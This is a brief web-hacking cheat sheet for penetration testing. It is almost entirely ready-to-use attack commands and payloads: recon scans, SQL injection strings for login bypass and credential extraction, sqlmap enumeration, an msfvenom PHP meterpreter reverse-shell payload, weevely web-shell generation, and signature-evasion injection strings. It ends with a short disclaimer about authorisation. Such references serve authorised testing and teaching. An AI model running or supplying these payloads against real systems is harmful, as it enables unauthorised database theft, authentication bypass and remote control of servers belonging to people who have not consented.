Web Hacking Cheat Sheet

Essential techniques for web application penetration testing

Web Server Reconnaissance

  • nikto -h [HOST] -Tuning x

    Find default content of web server

  • nmap -T4 -A -v [HOST]

    Port and service discovery scan

  • whatweb [HOST]

    Recognize web technologies and frameworks

  • gobuster dir -u [HOST] -w [DICTIONARY]

    Enumerate hidden files and directories

SQL Injection Techniques

  • ' or 1=1--

    Basic login bypass attempt

  • blah' UNION SELECT username, password from users --

    Extract user credentials

  • sqlmap -u [HOST] --cookie=[COOKIE] --dbs

    Automated database enumeration

  • 1 OR ascii(lower(substring((USER),1,1)))=97

    Blind SQL injection character extraction

Web Payload Generation

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444

    Create PHP meterpreter payload

  • weevely generate [PASSWORD] [FILE]

    Generate web shell

  • wpscan --url [HOST] --plugins-detection aggressive

    WordPress vulnerability scanning

Evasion Techniques

  • '/**/UN/**/ION/**/SEL/**/ECT

    SQL injection signature evasion

  • ' OR 'john'='john'

    Bypass simple authentication checks

  • %00' UNION SELECT Password FROM Users

    Null byte injection technique

Important Disclaimer

These techniques are for educational and ethical testing purposes only. Always obtain proper authorization before testing any systems. Unauthorized testing is illegal and unethical.